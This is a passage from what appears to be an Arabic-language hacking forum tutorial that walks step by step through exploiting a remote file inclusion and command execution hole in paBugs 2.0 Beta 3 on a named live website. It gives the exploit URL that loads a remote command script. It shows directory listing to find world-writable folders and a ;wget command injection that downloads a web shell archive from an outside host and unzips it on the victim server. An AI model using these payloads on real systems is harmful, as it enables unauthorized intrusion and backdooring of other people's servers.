و اكتب الكود اللي سبق و ذكرته لكم هذا: Powered by paBugs 2.0 Beta 3 و طبعا تقدر تطور و تلعب بالبحث دامك عرفت الثغرة انها في هالنوع المحدد paBugs 2.0 Beta 3
و من نتائج البحث اخترت موقعنا اللي قلنا بنطبق عليه,,
نذهب للموقع اللي اخترناه:
بنقووم الحين بالعمل على طول اضف بعد رابط الموقع مثل موقع التطبيق http://gangwars.irc-news.net/bugs كود الاستثمار اللي ذكرته في اعلى الموضوع,,: class.mysql.php?path_to_bt_dir=http://members.lycos.co.uk/palroot/cmd.gif?&cmd=id
و الحين شوووف اللي يظهر لك
لحد هنا و اعتقد الثغرة جدا سهلة و هي مماثلة لاي ثغرة كوماند اكسيوشن مثل ثغرة المتواجدين اللي تم شرحها هنا من قبل,,
عالعمووم ما بترككم لحالكم,, بنكمل الشرح لحد ما نرفع شل على الموقع
تابع معي الاتي و اللي هو كله عملية لرفع الشيل,,
اول حاجة نستعرض الصلاحيات على المجلد اللي موجودين فيه الحين بالامر ls -al و اعمل كليك يمين على الصفحة و شووف الصلاحيات و نحن اللي نبحث عنه هو مجلد يحمل الصلاحية 777 يعني يكوون كذا ظاهر على يساره drwxrwxrwx في موقع التطبيق مثل ما نلاحظ في المجلد الحالي مافي اي ملف يحمل الصلاحية drwxrwxrwx عشاان كذا بنرجع خطوة للخلف في مسار الموقع و نشووف ملجدات ثانية,,
اول شي نشووف المسار اللي نحن عليه حاليا,, بالامر pwd بيظهر التالي: /var/www/gangwars/bugs
طبعا نحن حاليا بــ bugs بنرجع للخلف عن طريق الامر التالي: cd /var/www/gangwars/;pwd يعني بنرجع للمجلد gangwars
اوكي حلوو حاليا رجعنا للمجلد gangwars الحين نقووم بعرض الصلاحيات على الملفات الموجودة في هالمجلد بالامر اللي سبق و ذكرناه في خطوات سابقة ls -al
شي طيب ظهرت تقريبا اربع ملفات عليها الصلاحية drwxrwxrwx وهي : 2004_graph counter online warbots
بنختار اي ملف من هذوول و بننتقل له,,
انا مثلا اخترت الملف counter و الحين بنتقل له و بقووم برفع الشيل تبعي عليه بنتقل عن طريق الامر التالي لاحظ: cd /var/www/gangwars/counter/;pwd
حلووو انا حاليا بالمجلد counter
كل اللي باقي هو رفع الشيل و فكه و خلصت السالفة
نقووم برفع الشيل عن طريق الامر التالي: تقووم بمسح ;pwd االلي بالخطوة السابقة مباشرة ,, و نضع هذا الامر التالي عنها: ;wget http://xp10.com/shell.zip;ls shell* طبعا هذا مثال لا غيرر يعني مكان http://xp10.com/shell.zip رابط شيلك و مكان shell اسم الشيل اللي وضعته,, و انتبه لهذا النجمة * تكون اخر شي مو بالاول
و في حالة التطبيق على موقعنا امري كان كذا: ;wget%20http://www.malfat.com/uploads/files12/flount1.zip;ls%20flount1*
و اذا ظهر لك اسم الشيل يعني تحمل الشيل بنجاح و الحمد لله
لاحظ الصوورة:
طييب تحمل الشيل و تبقت خطووة اخيرة و هي فك الضغط نستخدم الامر التالي unzip shell's name.zip shell'name بيكون هنا اسم الشيل
يعني في حالتنا بيكون كذا: unzip flount1.php
و اذا ظهر لك التالي: Archive: flount1.zip inflating: flount1.php يعني تم فك ضغط الشيل بنجاح,, طبعا الاسم بيتغير تبعا لاسم الشيل تبعك,,